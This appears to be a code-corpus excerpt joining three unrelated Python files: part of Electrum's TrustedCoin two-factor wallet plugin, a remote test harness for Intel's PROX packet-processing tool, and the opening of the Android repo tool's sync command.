Transfer a cosigner's credits to another cosigner.
:param id: the id of the sending cosigner
:param recipient: the id of the recipient cosigner
:param otp: the one time password (of the sender)
:param signature_callback: a callback that signs a text message using xpubkey1/0/0 returning a compact sig
"""
payload = {
'otp': otp,
'recipient': recipient,
'timestamp': int(time.time()),
}
relative_url = 'cosigner/%s/transfer' % quote(id)
full_url = urljoin(self.base_url, relative_url)
headers = {
'x-signature': signature_callback(full_url + '\n' + json.dumps(payload))
}
return self.send_request('post', relative_url, payload, headers)
server = TrustedCoinCosignerClient(user_agent="Electrum/" + version.ELECTRUM_VERSION)
class Wallet_2fa(Multisig_Wallet):
wallet_type = '2fa'
def __init__(self, storage):
self.m, self.n = 2, 3
Deterministic_Wallet.__init__(self, storage)
self.is_billing = False
self.billing_info = None
self._load_billing_addresses()
def _load_billing_addresses(self):
billing_addresses = self.storage.get('trustedcoin_billing_addresses', {})
self._billing_addresses = {} # index -> addr
# convert keys from str to int
for index, addr in list(billing_addresses.items()):
self._billing_addresses[int(index)] = addr
self._billing_addresses_set = set(self._billing_addresses.values()) # set of addrs
def can_sign_without_server(self):
return not self.keystores['x2/'].is_watching_only()
def get_user_id(self):
return get_user_id(self.storage)
def min_prepay(self):
return min(self.price_per_tx.keys())
def num_prepay(self, config):
default = self.min_prepay()
n = config.get('trustedcoin_prepay', default)
if n not in self.price_per_tx:
n = default
return n
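# Fee TrustedCoin charges for this transaction; zero if the wallet can sign without the server, billing info is still being fetched, prepaid transactions remain, or this is a billing transaction.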
def extra_fee(self, config):
if self.can_sign_without_server():
return 0
if self.billing_info is None:
self.plugin.start_request_thread(self)
return 0
if self.billing_info.get('tx_remaining'):
return 0
if self.is_billing:
return 0
n = self.num_prepay(config)
price = int(self.price_per_tx[n])
if price > 100000 * n:
raise Exception('too high trustedcoin fee ({} for {} txns)'.format(price, n))
return price
def make_unsigned_transaction(self, coins, outputs, config, fixed_fee=None,
change_addr=None, is_sweep=False):
mk_tx = lambda o: Multisig_Wallet.make_unsigned_transaction(
self, coins, o, config, fixed_fee, change_addr)
fee = self.extra_fee(config) if not is_sweep else 0
if fee:
address = self.billing_info['billing_address']
fee_output = TxOutput(TYPE_ADDRESS, address, fee)
try:
tx = mk_tx(outputs + [fee_output])
except NotEnoughFunds:
# TrustedCoin won't charge if the total inputs is
# lower than their fee
tx = mk_tx(outputs)
if tx.input_value() >= fee:
raise
self.print_error("not charging for this tx")
else:
tx = mk_tx(outputs)
return tx
def on_otp(self, tx, otp):
if not otp:
self.print_error("sign_transaction: no auth code")
return
otp = int(otp)
long_user_id, short_id = self.get_user_id()
raw_tx = tx.serialize_to_network()
r = server.sign(short_id, raw_tx, otp)
if r:
raw_tx = r.get('transaction')
tx.update(raw_tx)
self.print_error("twofactor: is complete", tx.is_complete())
# reset billing_info
self.billing_info = None
self.plugin.start_request_thread(self)
def add_new_billing_address(self, billing_index: int, address: str):
saved_addr = self._billing_addresses.get(billing_index)
if saved_addr is not None:
if saved_addr == address:
return # already saved this address
else:
raise Exception('trustedcoin billing address inconsistency.. '
'for index {}, already saved {}, now got {}'
.format(billing_index, saved_addr, address))
# do we have all prior indices? (are we synced?)
largest_index_we_have = max(self._billing_addresses) if self._billing_addresses else -1
if largest_index_we_have + 1 < billing_index: # need to sync
for i in range(largest_index_we_have + 1, billing_index):
addr = make_billing_address(self, i)
self._billing_addresses[i] = addr
self._billing_addresses_set.add(addr)
# save this address; and persist to disk
self._billing_addresses[billing_index] = address
self._billing_addresses_set.add(address)
self.storage.put('trustedcoin_billing_addresses', self._billing_addresses)
# FIXME this often runs in a daemon thread, where storage.write will fail
self.storage.write()
def is_billing_address(self, addr: str) -> bool:
return addr in self._billing_addresses_set
# Utility functions
def get_user_id(storage):
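# long_id is sha256 over the two sorted xpubs; short_id is the hex sha256 of long_id and is the account id used in TrustedCoin API URLs.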
def make_long_id(xpub_hot, xpub_cold):
return bitcoin.sha256(''.join(sorted([xpub_hot, xpub_cold])))
xpub1 = storage.get('x1/')['xpub']
xpub2 = storage.get('x2/')['xpub']
long_id = make_long_id(xpub1, xpub2)
short_id = hashlib.sha256(long_id).hexdigest()
return long_id, short_id
def make_xpub(xpub, s):
version, _, _, _, c, cK = deserialize_xpub(xpub)
cK2, c2 = bitcoin._CKD_pub(cK, c, s)
return bitcoin.serialize_xpub(version, c2, cK2)
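# Billing addresses are derived from TrustedCoin's billing xpub, tweaked with the wallet's long user id and then child-derived at the billing index.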
def make_billing_address(wallet, num):
long_id, short_id = wallet.get_user_id()
xpub = make_xpub(get_billing_xpub(), long_id)
version, _, _, _, c, cK = deserialize_xpub(xpub)
cK, c = bitcoin.CKD_pub(cK, c, num)
return bitcoin.public_key_to_p2pkh(cK)
class TrustedCoinPlugin(BasePlugin):
wallet_class = Wallet_2fa
disclaimer_msg = DISCLAIMER
def __init__(self, parent, config, name):
BasePlugin.__init__(self, parent, config, name)
self.wallet_class.plugin = self
self.requesting = False
@staticmethod
def is_valid_seed(seed):
return bitcoin.is_new_seed(seed, SEED_PREFIX)
def is_available(self):
return True
def is_enabled(self):
return True
def can_user_disable(self):
return False
@hook
def tc_sign_wrapper(self, wallet, tx, on_success, on_failure):
if not isinstance(wallet, self.wallet_class):
return
if tx.is_complete():
return
if wallet.can_sign_without_server():
return
if not wallet.keystores['x3/'].get_tx_derivations(tx):
self.print_error("twofactor: xpub3 not needed")
return
def wrapper(tx):
self.prompt_user_for_otp(wallet, tx, on_success, on_failure)
return wrapper
@hook
def get_tx_extra_fee(self, wallet, tx):
if type(wallet) != Wallet_2fa:
return
for o in tx.outputs():
if o.type == TYPE_ADDRESS and wallet.is_billing_address(o.address):
return o.address, o.value
def finish_requesting(func):
def f(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
finally:
self.requesting = False
return f
@finish_requesting
def request_billing_info(self, wallet):
if wallet.can_sign_without_server():
return
self.print_error("request billing info")
try:
billing_info = server.get(wallet.get_user_id()[1])
except ErrorConnectingServer as e:
self.print_error('cannot connect to TrustedCoin server: {}'.format(e))
return
billing_index = billing_info['billing_index']
billing_address = make_billing_address(wallet, billing_index)
if billing_address != billing_info['billing_address']:
raise Exception('unexpected trustedcoin billing address: expected {}, received {}'
.format(billing_address, billing_info['billing_address']))
wallet.add_new_billing_address(billing_index, billing_address)
wallet.billing_info = billing_info
wallet.price_per_tx = dict(billing_info['price_per_tx'])
wallet.price_per_tx.pop(1, None)
return True
def start_request_thread(self, wallet):
from threading import Thread
if self.requesting is False:
self.requesting = True
t = Thread(target=self.request_billing_info, args=(wallet,))
t.setDaemon(True)
t.start()
return t
def make_seed(self):
return Mnemonic('english').make_seed(seed_type='2fa', num_bits=128)
@hook
def do_clear(self, window):
window.wallet.is_billing = False
def show_disclaimer(self, wizard):
wizard.set_icon(':icons/trustedcoin-wizard.png')
wizard.stack = []
wizard.confirm_dialog(title='Disclaimer', message='\n\n'.join(self.disclaimer_msg), run_next = lambda x: wizard.run('choose_seed'))
def choose_seed(self, wizard):
title = _('Create or restore')
message = _('Do you want to create a new seed, or to restore a wallet using an existing seed?')
choices = [
('create_seed', _('Create a new seed')),
('restore_wallet', _('I already have a seed')),
]
wizard.choice_dialog(title=title, message=message, choices=choices, run_next=wizard.run)
def create_seed(self, wizard):
seed = self.make_seed()
f = lambda x: wizard.request_passphrase(seed, x)
wizard.show_seed_dialog(run_next=f, seed_text=seed)
@classmethod
def get_xkeys(self, seed, passphrase, derivation):
from electrum.mnemonic import Mnemonic
from electrum.keystore import bip32_root, bip32_private_derivation
bip32_seed = Mnemonic.mnemonic_to_seed(seed, passphrase)
xprv, xpub = bip32_root(bip32_seed, 'standard')
xprv, xpub = bip32_private_derivation(xprv, "m/", derivation)
return xprv, xpub
@classmethod
def xkeys_from_seed(self, seed, passphrase):
words = seed.split()
n = len(words)
# old version use long seed phrases
if n >= 20:
# note: pre-2.7 2fa seeds were typically 24-25 words, however they
# could probabilistically be arbitrarily shorter due to a bug. (see #3611)
# the probability of it being < 20 words is about 2^(-(256+12-19*11)) = 2^(-59)
if passphrase != '':
raise Exception('old 2fa seed cannot have passphrase')
xprv1, xpub1 = self.get_xkeys(' '.join(words[0:12]), '', "m/")
xprv2, xpub2 = self.get_xkeys(' '.join(words[12:]), '', "m/")
elif n==12:
xprv1, xpub1 = self.get_xkeys(seed, passphrase, "m/0'/")
xprv2, xpub2 = self.get_xkeys(seed, passphrase, "m/1'/")
else:
raise Exception('unrecognized seed length: {} words'.format(n))
return xprv1, xpub1, xprv2, xpub2
def create_keystore(self, wizard, seed, passphrase):
# this overloads the wizard's method
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
k1 = keystore.from_xprv(xprv1)
k2 = keystore.from_xpub(xpub2)
wizard.request_password(run_next=lambda pw, encrypt: self.on_password(wizard, pw, encrypt, k1, k2))
def on_password(self, wizard, password, encrypt_storage, k1, k2):
k1.update_password(None, password)
wizard.storage.set_keystore_encryption(bool(password))
if encrypt_storage:
wizard.storage.set_password(password, enc_version=STO_EV_USER_PW)
wizard.storage.put('x1/', k1.dump())
wizard.storage.put('x2/', k2.dump())
wizard.storage.write()
self.go_online_dialog(wizard)
def restore_wallet(self, wizard):
wizard.opt_bip39 = False
wizard.opt_ext = True
title = _("Restore two-factor Wallet")
f = lambda seed, is_bip39, is_ext: wizard.run('on_restore_seed', seed, is_ext)
wizard.restore_seed_dialog(run_next=f, test=self.is_valid_seed)
def on_restore_seed(self, wizard, seed, is_ext):
f = lambda x: self.restore_choice(wizard, seed, x)
wizard.passphrase_dialog(run_next=f) if is_ext else f('')
def restore_choice(self, wizard, seed, passphrase):
wizard.set_icon(':icons/trustedcoin-wizard.png')
wizard.stack = []
title = _('Restore 2FA wallet')
msg = ' '.join([
'You are going to restore a wallet protected with two-factor authentication.',
'Do you want to keep using two-factor authentication with this wallet,',
'or do you want to disable it, and have two master private keys in your wallet?'
])
choices = [('keep', 'Keep'), ('disable', 'Disable')]
f = lambda x: self.on_choice(wizard, seed, passphrase, x)
wizard.choice_dialog(choices=choices, message=msg, title=title, run_next=f)
def on_choice(self, wizard, seed, passphrase, x):
if x == 'disable':
f = lambda pw, encrypt: wizard.run('on_restore_pw', seed, passphrase, pw, encrypt)
wizard.request_password(run_next=f)
else:
self.create_keystore(wizard, seed, passphrase)
def on_restore_pw(self, wizard, seed, passphrase, password, encrypt_storage):
storage = wizard.storage
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
k1 = keystore.from_xprv(xprv1)
k2 = keystore.from_xprv(xprv2)
k1.add_seed(seed)
k1.update_password(None, password)
k2.update_password(None, password)
storage.put('x1/', k1.dump())
storage.put('x2/', k2.dump())
long_user_id, short_id = get_user_id(storage)
xpub3 = make_xpub(get_signing_xpub(), long_user_id)
k3 = keystore.from_xpub(xpub3)
storage.put('x3/', k3.dump())
storage.set_keystore_encryption(bool(password))
if encrypt_storage:
storage.set_password(password, enc_version=STO_EV_USER_PW)
wizard.wallet = Wallet_2fa(storage)
wizard.create_addresses()
def create_remote_key(self, email, wizard):
xpub1 = wizard.storage.get('x1/')['xpub']
xpub2 = wizard.storage.get('x2/')['xpub']
# Generate third key deterministically.
long_user_id, short_id = get_user_id(wizard.storage)
xpub3 = make_xpub(get_signing_xpub(), long_user_id)
# secret must be sent by the server
try:
r = server.create(xpub1, xpub2, email)
except (socket.error, ErrorConnectingServer):
wizard.show_message('Server not reachable, aborting')
wizard.terminate()
return
except TrustedCoinException as e:
if e.status_code == 409:
r = None
else:
wizard.show_message(str(e))
return
if r is None:
otp_secret = None
else:
otp_secret = r.get('otp_secret')
if not otp_secret:
wizard.show_message(_('Error'))
return
_xpub3 = r['xpubkey_cosigner']
_id = r['id']
if short_id != _id:
wizard.show_message("unexpected trustedcoin short_id: expected {}, received {}"
.format(short_id, _id))
return
if xpub3 != _xpub3:
wizard.show_message("unexpected trustedcoin xpub3: expected {}, received {}"
.format(xpub3, _xpub3))
return
self.request_otp_dialog(wizard, short_id, otp_secret, xpub3)
def check_otp(self, wizard, short_id, otp_secret, xpub3, otp, reset):
if otp:
self.do_auth(wizard, short_id, otp, xpub3)
elif reset:
wizard.opt_bip39 = False
wizard.opt_ext = True
f = lambda seed, is_bip39, is_ext: wizard.run('on_reset_seed', short_id, seed, is_ext, xpub3)
wizard.restore_seed_dialog(run_next=f, test=self.is_valid_seed)
def on_reset_seed(self, wizard, short_id, seed, is_ext, xpub3):
f = lambda passphrase: wizard.run('on_reset_auth', short_id, seed, passphrase, xpub3)
wizard.passphrase_dialog(run_next=f) if is_ext else f('')
def do_auth(self, wizard, short_id, otp, xpub3):
try:
server.auth(short_id, otp)
except TrustedCoinException as e:
if e.status_code == 400: # invalid OTP
wizard.show_message(_('Invalid one-time password.'))
# ask again for otp
self.request_otp_dialog(wizard, short_id, None, xpub3)
else:
wizard.show_message(str(e))
wizard.terminate()
except Exception as e:
wizard.show_message(str(e))
wizard.terminate()
else:
k3 = keystore.from_xpub(xpub3)
wizard.storage.put('x3/', k3.dump())
wizard.storage.put('use_trustedcoin', True)
wizard.storage.write()
wizard.wallet = Wallet_2fa(wizard.storage)
wizard.run('create_addresses')
def on_reset_auth(self, wizard, short_id, seed, passphrase, xpub3):
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
if (wizard.storage.get('x1/')['xpub'] != xpub1 or
wizard.storage.get('x2/')['xpub'] != xpub2):
wizard.show_message(_('Incorrect seed'))
return
r = server.get_challenge(short_id)
challenge = r.get('challenge')
message = 'TRUSTEDCOIN CHALLENGE: ' + challenge
def f(xprv):
_, _, _, _, c, k = deserialize_xprv(xprv)
pk = bip32_private_key([0, 0], k, c)
key = ecc.ECPrivkey(pk)
sig = key.sign_message(message, True)
return base64.b64encode(sig).decode()
signatures = [f(x) for x in [xprv1, xprv2]]
r = server.reset_auth(short_id, challenge, signatures)
new_secret = r.get('otp_secret')
if not new_secret:
wizard.show_message(_('Request rejected by server'))
return
self.request_otp_dialog(wizard, short_id, new_secret, xpub3)
@hook
def get_action(self, storage):
if storage.get('wallet_type') != '2fa':
return
if not storage.get('x1/'):
return self, 'show_disclaimer'
if not storage.get('x2/'):
return self, 'show_disclaimer'
if not storage.get('x3/'):
return self, 'accept_terms_of_use'
|
prox.py
|
#!/bin/env python
##
# Copyright(c) 2010-2015 Intel Corporation.
# Copyright(c) 2016-2018 Viosoft Corporation.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Intel Corporation nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
##
import threading
from time import *
from proxsocket import *
from remotesystem import *
import time  # ensure 'time' names the module; 'from time import *' above binds it to the time() function
class ProxStarter:
def __init__(self, remoteSystem, cmd):
self._remoteSystem = remoteSystem
self._cmd = cmd
self._thread = None
self._prox = None;
self._result = None;
self._startDuration = None
def startThreaded(self):
self._start_thread = threading.Thread(target = self._run, args = (self, 1))
self._start_thread.start();
def joinThreaded(self):
self._start_thread.join();
return self._result;
def getResult(self):
return self._result;
def getStartDuration(self):
return self._startDuration;
def getProx(self):
return self._prox;
def _run(self, a, b):
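# Kill any prox instance still running on the remote system, launch the new one, and record how long the start took.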
before = time.time()
self._remoteSystem.run("sudo killall -w -q -9 prox")
self._result = self._remoteSystem.run(self._cmd);
sleep(1)
after = time.time()
self._startDuration = after - before;
class StatsCmd(object):
def __init__(self, prox):
self._cmd = ""
self._parts = []
self._beforeParts = []
self._prox = prox;
def sendRecv(self):
cmd = self.getCmd()
reply = self._prox._send(cmd)._recv()
self.setReply(reply)
def add(self, stats):
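# Each stats expression adds count(',')+1 fields to the combined reply; remember its offset so getResult() can slice out just this command's values.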
if (len(self._cmd) != 0):
self._cmd += ","
self._cmd += stats
if (len(self._parts) == 0):
self._beforeParts += [0]
else:
before = self._parts[-1] + self._beforeParts[-1];
self._beforeParts += [before]
self._parts += [stats.count(",") + 1];
def getCmd(self):
return "stats " + self._cmd;
def setReply(self, reply):
self._reply = reply.split(",");
def getResult(self, idx):
start = self._beforeParts[idx];
end = start + self._parts[idx];
return self._reply[start:end]
class Prox(object):
def __init__(self, systemConfig):
self._systemConfig = systemConfig;
self._proxStarter = None
user = self._systemConfig._user
ip = self._systemConfig._ip
self._remoteSystem = remoteSystem(user, ip);
self.resetArguments()
def resetArguments(self):
self._args = []
def addArgument(self, arg):
self._args.append(arg);
def startFork(self):
cmd = self.getCmd();
self._proxStarter = ProxStarter(self._remoteSystem, cmd)
self._proxStarter.startThreaded();
def startJoin(self):
ret = self.startJoinNoConnect();
self._connectSocket();
self._querySetup();
return self._proxStarter.getStartDuration();
def startJoinNoConnect(self):
return self._proxStarter.joinThreaded();
def getCmd(self):
proxDir = self._systemConfig.getProxDir();
cfgFile = self._systemConfig.getCfgFile();
cmd = "cd " + proxDir + "; "
cmd += "sudo ./build/prox "
cmd += "-f " + cfgFile
for arg in self._args:
cmd += " " + arg
return cmd
def getLog(self):
proxDir = self._systemConfig.getProxDir()
cmd = "cat " + proxDir + "/prox.log";
return self._remoteSystem.run(cmd)["out"];
def getIP(self):
return self._systemConfig._ip;
def getHz(self):
return self._hz;
def getBeg(self):
return self._beg;
def getPorts(self):
return self._ports;
def getIerrors(self):
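# Query the ierrors counter of every port in a single batched stats command and return the sum.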
sc = StatsCmd(self)
sc.add(self._buildIerrorsCmd());
sc.sendRecv()
return self._parseIerrorsReply(sc.getResult(0));
def _parseIerrorsReply(self, rep):
tot_ierrors = 0;
for e in rep:
tot_ierrors += int(e);
return tot_ierrors;
def _buildIerrorsCmd(self):
cmd = ""
for port in self._ports:
if (len(cmd)):
cmd += ","
cmd += "port(%s).ierrors" % str(port)
return cmd;
def waitCmdFinished(self):
self._send("stats hz")._recv();
def waitAllLinksUp(self):
link_down = True;
while (link_down):
link_down = False;
for port in self._ports:
cmd = "port link state %s" % str(port)
link_state = self._send(cmd)._recv();
if (link_state == "down"):
link_down = True;
print "Link down on port " + str(port) + ", waiting one second"
break;
sleep(1);
def startAllCores(self):
self._send("start all");
def stopAllCores(self):
self._send("stop all");
def forceQuit(self):
self._send("quit_force")._recv();
def killProx(self):
self._remoteSystem.run("sudo killall -w -q -9 prox")
def getTsc(self):
return self._getTsc();
def _getTsc(self):
return int(self._send("stats global.tsc")._recv());
def scpStatsDump(self, dst):
proxDir = self._systemConfig.getProxDir()
src = proxDir + "/stats_dump";
print "Copying " + src + " to " + dst
self._remoteSystem.scp(src, dst);
def _querySetup(self):
print "Query setup on " + str(self.getIP())
self._queryHz()
self._queryBeg()
self._queryPorts()
self._querySetup2()
def _querySetup2(self):
print "running query 2"
pass
def quitProx(self):
self._send("quit")._recv();
def _queryHz(self):
self._hz = int(self._send("stats hz")._recv());
def _queryBeg(self):
self._beg = self._getTsc();
def _queryPorts(self):
self._ports = []
port_info_all = self._send("port info all")._recv();
port_info_list = port_info_all.split(',');
for port_info in port_info_list:
if (len(port_info) > 0):
self._ports.append(int(port_info.split(":")[0]));
def _connectSocket(self):
self._proxSocket = ProxSocket(self.getIP())
def _send(self, msg):
self._proxSocket.send(msg);
return self
def _recv(self):
return self._proxSocket.recv();
|
sync.py
|
#
# Copyright (C) 2008 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import json
import netrc
from optparse import SUPPRESS_HELP
import os
import re
import socket
import subprocess
import sys
import tempfile
import time
from pyversion import is_python3
if is_python3():
import http.cookiejar as cookielib
import urllib.error
import urllib.parse
import urllib.request
import xmlrpc.client
else:
import cookielib
import imp
import urllib2
import urlparse
import xmlrpclib
urllib = imp.new_module('urllib')
urllib.error = urllib2
urllib.parse = urlparse
urllib.request = urllib2
xmlrpc = imp.new_module('xmlrpc')
xmlrpc.client = xmlrpclib
try:
import threading as _threading
except ImportError:
import dummy_threading as _threading
try:
import resource
def _rlimit_nofile():
return resource.getrlimit(resource.RLIMIT_NOFILE)
except ImportError:
def _rlimit_nofile():
return (256, 256)
try:
import multiprocessing
except ImportError:
multiprocessing = None
import event_log
from git_command import GIT, git_require
from git_config import GetUrlCookieFile
from git_refs import R_HEADS, HEAD
import gitc_utils
from project import Project
from project import RemoteSpec
from command import Command, MirrorSafeCommand
from error import RepoChangedException, GitError, ManifestParseError
import platform_utils
from project import SyncBuffer
from progress import Progress
from wrapper import Wrapper
from manifest_xml import GitcManifest
_ONE_DAY_S = 24 * 60 * 60
class _FetchError(Exception):
"""Internal error thrown in _FetchHelper() when we don't want stack trace."""
pass
class Sync(Command, MirrorSafeCommand):
jobs = 1
common = True
helpSummary = "Update working tree to the latest revision"
helpUsage = """
%prog [<project>...]
"""
helpDescription = """
The '%prog' command synchronizes local project directories
with the remote repositories specified in the manifest. If a local
project does not yet exist, it will clone a new local directory from
the remote repository and set up tracking branches as specified in
the manifest. If the local project already exists, '%prog'
will update the remote branches and rebase any new local changes
on top of the new remote changes.
'%prog' will synchronize all projects listed at the command
line. Projects can be specified either by name, or by a relative
or absolute path to the project's local directory. If no projects
are specified, '%prog' will synchronize all projects listed in
the manifest.
The -d/--detach option can be used to switch specified projects
back to the manifest revision. This option is especially helpful
if the project is currently on a topic branch, but the manifest
revision is temporarily needed.
The -s/--smart-sync option can be used to sync to a known good
build as specified by the manifest-server element in the current
manifest. The -t/--smart-tag option is similar and allows you to
specify a custom tag/label.
The -u/--manifest-server-username and -p/--manifest-server-password
options can be used to specify a username and password to authenticate
with the manifest server when using the -s or -t option.
If -u and -p are not specified when using the -s or -t option, '%prog'
will attempt to read authentication credentials for the manifest server
from the user's .netrc file.
'%prog' will not use authentication credentials from -u/-p or .netrc
if the manifest server specified in the manifest file already includes
credentials.
The -f/--force-broken option can be used to proceed with syncing
other projects if a project sync fails.
The --force-sync option can be used to overwrite existing git
directories if they have previously been linked to a different
object directory. WARNING: This may cause data to be lost since
refs may be removed when overwriting.
The --force-remove-dirty option can be used to remove previously used
projects with uncommitted changes. WARNING: This may cause data to be
lost since uncommitted changes may be removed with projects that no longer
exist in the manifest.
The --no-clone-bundle option disables any attempt to use
$URL/clone.bundle to bootstrap a new Git repository from a
resumable bundle file on a content delivery network. This
may be necessary if there are problems with the local Python
HTTP client or proxy configuration, but the Git binary works.
The --fetch-submodules option enables fetching Git submodules
of a project from server.
The -c/--current-branch option can be used to only fetch objects that
are on the branch specified by a project's revision.
The --optimized-fetch option can be used to only fetch projects that
are fixed to a sha1 revision if the sha1 revision does not already
exist locally.
The --prune option can be used to remove any refs that no longer
exist on the remote.
# SSH Connections
If at least one project remote URL uses an SSH connection (ssh://,
git+ssh://, or user@host:path syntax) repo will automatically
enable the SSH ControlMaster option when connecting to that host.
This feature permits other projects in the same '%prog' session to
reuse the same SSH tunnel, saving connection setup overheads.
To disable this behavior on UNIX platforms, set the GIT_SSH
environment variable to 'ssh'. For example:
export GIT_SSH=ssh
%prog
# Compatibility
This feature is automatically disabled on Windows, due to the lack
of UNIX domain socket support.
This feature is not compatible with url.insteadof rewrites in the
user's ~/.gitconfig. '%prog' is currently not able to perform the
rewrite early enough to establish the ControlMaster tunnel.
If the remote SSH daemon is Gerrit Code Review, version 2.0.10 or
later is required to fix a server side protocol bug.
"""
def _Options(self, p, show_smart=True):
try:
self.jobs = self.manifest.default.sync_j
except ManifestParseError:
self.jobs = 1
p.add_option('-f', '--force-broken',
dest='force_broken', action='store_true',
help="continue sync even if a project fails to sync")
p.add_option('--force-sync',
dest='force_sync', action='store_true',
help="overwrite an existing git directory if it needs to "
"point to a different object directory. WARNING: this "
"may cause loss of data")
p.add_option('--force-remove-dirty',
dest='force_remove_dirty', action='store_true',
help="force remove projects with uncommitted modifications if "
"projects no longer exist in the manifest. "
"WARNING: this may cause loss of data")
p.add_option('-l', '--local-only',
dest='local_only', action='store_true',
help="only update working tree, don't fetch")
p.add_option('-n', '--network-only',
dest='network_only', action='store_true',
help="fetch only, don't update working tree")
p.add_option('-d', '--detach',
dest='detach_head', action='store_true',
help='detach projects back to manifest revision')
p.add_option('-c', '--current-branch',
dest='current_branch_only', action='store_true',
help='fetch only current branch from server')
p.add_option('-q', '--quiet',
dest='quiet', action='store_true',
help='be more quiet')
p.add_option('-j', '--jobs',
dest='jobs', action='store', type='int',
help="projects to fetch simultaneously (default %d)" % self.jobs)
p.add_option('-m', '--manifest-name',
dest='manifest_name',
help='temporary manifest to use for this sync', metavar='NAME.xml')
p.add_option('--no-clone-bundle',
dest='no_clone_bundle', action='store_true',
help='disable use of /clone.bundle on HTTP/HTTPS')
p.add_option('-u', '--manifest-server-username', action='store',
dest='manifest_server_username',
help='username to authenticate with the manifest server')
p.add_option('-p', '--manifest-server-password', action='store',
dest='manifest_server_password',
help='password to authenticate with the manifest server')
p.add_option('--fetch-submodules',
dest='fetch_submodules', action='store_true',
help='fetch submodules from server')
p.add_option('--no-tags',
dest='no_tags', action='store_true',
help="don't fetch tags")
p.add_option('--optimized-fetch',
dest='optimized_fetch', action='store_true',
help='only fetch projects fixed to sha1 if revision does not exist locally')
p.add_option('--prune', dest='prune', action='store_true',
help='delete refs that no longer exist on the remote')
if show_smart:
p.add_option('-s', '--smart-sync',
dest='smart_sync', action='store_true',
help='smart sync using manifest from the latest known good build')
p.add_option('-t', '--smart-tag',
dest='smart_tag', action='store',
help='smart sync using manifest from a known tag')
g = p.add_option_group('repo Version options')
g.add_option('--no-repo-verify',
dest='no_repo_verify', action='store_true',
help='do not verify repo source code')
g.add_option('--repo-upgraded',
dest='repo_upgraded', action='store_true',
help=SUPPRESS_HELP)
def _FetchProjectList(self, opt, projects, sem, *args, **kwargs):
"""Main function of the fetch threads when jobs are > 1.
Delegates most of the work to _FetchHelper.
Args:
opt: Program options returned from optparse. See _Options().
projects: Projects to fetch.
sem: We'll release() this semaphore when we exit so that another thread
can be started up.
*args, **kwargs: Remaining arguments to pass to _FetchHelper. See the
_FetchHelper docstring for details.
"""
try:
for project in projects:
success = self._FetchHelper(opt, project, *args, **kwargs)
if not success and not opt.force_broken:
break
finally:
sem.release()
def _FetchHelper(self, opt, project, lock, fetched, pm, err_event):
"""Fetch git objects for a single project.
Args:
opt: Program options returned from optparse. See _Options().
project: Project object for the project to fetch.
lock: Lock for accessing objects that are shared amongst multiple
_FetchHelper() threads.
fetched: set object that we will add project.gitdir to when we're done
(with our lock held).
pm: Instance of a Project object. We will call pm.update() (with our
lock held).
err_event: We'll set this event in the case of an error (after printing
out info about the error).
Returns:
Whether the fetch was successful.
"""
# We'll set to true once we've locked the lock.
did_lock = False
if not opt.quiet:
print('Fetching project %s' % project.name)
# Encapsulate everything in a try/except/finally so that:
# - We always set err_event in the case of an exception.
# - We always make sure we call sem.release().
# - We always make sure we unlock the lock if we locked it.
start = time.time()
success = False
try:
try:
success = project.Sync_NetworkHalf(
quiet=opt.quiet,
current_branch_only=opt.current_branch_only,
force_sync=opt.force_sync,
clone_bundle=not opt.no_clone_bundle,
no_tags=opt.no_tags, archive=self.manifest.IsArchive,
optimized_fetch=opt.optimized_fetch,
prune=opt.prune)
self._fetch_times.Set(project, time.time() - start)
# Lock around all the rest of the code, since printing, updating a set
# and Progress.update() are not thread safe.
lock.acquire()
did_lock = True
if not success:
err_event.set()
print('error: Cannot fetch %s from %s'
% (project.name, project.remote.url),
file=sys.stderr)
if opt.force_broken:
print('warn: --force-broken, continuing to sync',
file=sys.stderr)
else:
raise _FetchError()
fetched.add(project.gitdir)
pm.update()
except _FetchError:
pass
except Exception as e:
print('error: Cannot fetch %s (%s: %s)' \
% (project.name, type(e).__name__, str(e)), file=sys.stderr)
err_event.set()
raise
finally:
if did_lock:
lock.release()
finish = time.time()
self.event_log.AddSync(project, event_log.TASK_SYNC_NETWORK,
start, finish, success)
return success
def _Fetch(self, projects, opt):
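# Group projects that share an object directory so each group is fetched by one worker, then fan the groups out over up to self.jobs threads.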
fetched = set()
lock = _threading.Lock()
pm = Progress('Fetching projects', len(projects),
print_newline=not(opt.quiet),
always_print_percentage=opt.quiet)
objdir_project_map = dict()
for project in projects:
objdir_project_map.setdefault(project.objdir, []).append(project)
threads = set()
sem = _threading.Semaphore(self.jobs)
